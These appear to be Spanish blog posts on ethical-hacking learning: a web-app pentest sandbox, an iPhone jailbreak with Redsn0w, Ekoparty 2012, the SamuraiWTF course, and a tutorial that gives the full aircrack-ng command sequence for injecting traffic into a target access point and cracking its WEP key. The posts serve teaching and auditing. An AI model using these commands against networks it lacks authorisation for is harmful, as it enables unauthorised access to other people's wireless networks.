Hack.me un Sandbox para nuestro aprendizaje de Ethical Hacking

Hack.me http://hack.me es un sitio web que permite que montemos nuestras propias aplicaciones para hacer Pentesting o levantar alguna de las aplicaciones ya existentes como la excelente Multillidae que es parte de OWASP y permite hacer ataques web a la aplicacion en orden del TOP 10 de OWASP… claramente es la herramienta si necesitas aprender a hacer hacking de web apps y es lo que uso siempre con mis alumnos de CEH.

Puedes usar los Hackme que otros usuarios ya han creado y usarlas en un Sandbox separado y especial para ti donde unicamente tu tienes acceso o lo puedes compartir con alguien. IDEAL o NO?? 😀

Yo lo acabo de probar y pude tener una sesion de Multillidae en solo 2 minutos Up and Running! como invitado incluso! donde solo se debe resolver un captcha.

Espero les guste y puedan montar sus demos facilmente!

Como Hacer Jailbreak a Iphone 3GS, 4G, 4S y 5

Esto esta ampliamente documentado en varios sitios de internet, pero como hace poco tuve que hacer el Jailbreak a mis teléfonos y me parece excelente tomar un poco de tiempo y explicarlo rápidamente para quienes aun no tienen Desbloqueado su Teléfono. 🙂

Requerido:

– Redsn0w 0.9.15b3, que se puede descargar desde AQUI o desde AQUI

– iTunes para Windows

Primero felicitar al equipo de Redsn0w, pues el proceso es bastante fácil de hacer para cualquier usuario y si no funciona el proceso con DFU, el proceso de backup-restore me ha funcionado perfecto!

Proceso:

Fácil, bajamos el redsn0w y lo ejecutamos:

Luego seleccionamos Jailbreak y allí debemos seleccionar si usamos DFU o Backup/Recovery Método. en mi caso especifico me dio problemas el DFU y al volver a ejecutarlo me comenzó automáticamente con la 2a opción de Backup/Recovery .

Al finalizar te aparecerá el mensaje de que esta el Jailbreak listo y tendras el Icono de Cydia en tu IPhone! 🙂

Asi de fácil…

La idea de este tutorial es hacer pentesting con el IPhone en los próximos posteos!

un Abrazo!

Saludos

Ekoparty 2012 Dia 1

Hoy llegue al primer día de la Ekoparty 2012 en Argentina, esta es la segunda vez que tengo la oportunidad de asistir, pero es la primera vez que me pongo a escribir sobre esta conferencia. la verdad es que es una de las cosas que no puedes perderte si trabajas en el área de seguridad informática o seguridad de la información como a algunos colegas les gusta! 😀

Comenzamos por un taller de armado de Antenas Biquad el cual estuvo muy entretenido y aquí les voy a compartir como poder armar su propia antena! 😀

Aca va el link de Buenos Aires Libre! 100% Recomendado: http://wiki.buenosaireslibre.org/HowToBicuad 

http://wiki.buenosaireslibre.org/Gu%C3%ADas%26HowTos

Saludos!

Curso de SamuraiWTF BlackHat 2012

Estimados, les aprovecho de compartir el curso de SamuraiWTF Presentado en BlackHat 2012

Samurai es una Distribucion Linux que viene cargado con las herramientas para Web Pentesting, aunque si bien prefiero Backtrack 😛 , Samurai esta bastante bien tambien! :D.

Espero lo Disfruten!

Saludos

Puedes Bajar Samurai desde Aqui: http://sourceforge.net/projects/samurai/files/latest/download?source=files 

El PDF del Curso lo puedes bajar desde Aqui: http://sourceforge.net/projects/samurai/files/SamuraiWTF%20Course/SamuraiWTF%20Course%20Slides%20v13%20-%20Black%20Hat%20Vegas%202012.pdf/download

Auditoria de Redes Wireless WEP Y WPA/WPA2 (Parte 1 de 3)

Se lo que piensan… esto es mas viejo que el hilo negro! 😛 , pero lo cierto es que siempre me preguntan como se realiza la auditoria de redes wireless y creo que es tiempo de hacer un pequeño tutorial al respecto y las nuevas herramientas para hacer este trabajo.

Que necesitamos:

– Backtrack 5 R2

– 1 Tarjeta inalambrica con capacidad de inyección (ver aqui: http://bit.ly/OgWisl) Yo uso una con Chipset Realtek 8187L con una antena bi-direccional de 6DBI y 1000mw (esta misma: http://bit.ly/LGhsQh)

Vamos a hacerlo de 2 formas.. a mano por linea de comandos (como debe ser) y luego para mis Script Kiddies una herramienta grafica mas facil.

Comenzamos: primero debemos parar el servicio DHCP que viene habilitado por defecto en Backtrack 5 en adelante, para eso debemos usar el comando: /etc/init.d/networking stop, luego ver si nuestra tarjeta inalambrica esta conectada: para esto debemos correr el comando: iwconfig y debemos ver algo como esto: wlan0

Paso siguiente es habilitar la tarjeta en modo Monitor con el comando: airmon-ng start wlan0

luego comenzamos a monitorear con el comando: airodump-ng mon0

Lo importante es identificar la red que deseamos romper ubicando el BSSID, ESSID, Canal y Nivel de Cifrado. (Si es WEP o WPA/WPA2)

Luego debemos dejar de escuchar todo y escuchar unicamente la red que deseamos auditar. para esto debemos usar este comando: airodump-ng -c CANAL -w ARCHIVO –bssid MAC-AP-VICTIMA mon0, por ejemplo para la red CasaGarcia debemos usar: airodump-ng -c 1 -w Audit-CasaGarcia –bssid 00:26:ED:84:52:C8 mon0  y aqui tenemos el resultado:

Como ven en la grafica se ven mac de equipos, pero no conectado a la red inalambrica, eso igual nos puede servir y es una debilidad de algunos routers de publicar inalambricamente las mac de los computadores que pasan por la red interna (LAN).

Ahora vamos a inyectar trafico para poder tener mas paquetes y poder romper WEP.

Vamos a comenzar con simular trafico, para esto debemos hacer el siguiente comando: aireplay-ng -1 9 -a MAC-AP-VICTIMA -h FAKE-MAC mon0, que en este caso es: aireplay-ng -1 9 -a 00:26:ED:84:52:C8 -h 11:22:33:44:55:66 mon0 y vemos el resultado que aparece una nueva conexion wireless con nuestra mac Falsa

ahora que tenemos este equipo falso en la red inalambrica vamos a hacer intentos de conexion a la red inalambrica para subir el trafico. para eso debemos usar el comando: aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b MAC-AP-VICTIMA –h FAKE-MAC mon0 , para este ejemplo debemos usar:  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:26:ED:84:52:C8 -h 11:22:33:44:55:66 mon0 y tendran algo como esto: donde les mostrara el paquete que va a inyectar, solo deben darle Y para que comience a inyectar el trafico.

luego para romper el cifrado deben usa el siguiente comando: aircrack-ng –bssid MAC-AP-VICTIMA ARCHIVO.CAP que en este caso seria: aircrack-ng –bssid 00:26:ED:84:52:C8 Audit-CasaGarcia-01.cap y se pondra a trabajar. y tendremos nuestra clave.

Ahora esperamos y voila! tendremos la clave WEP…

Proxima Entrega como hacerlo con WPA/WP2.

Saludos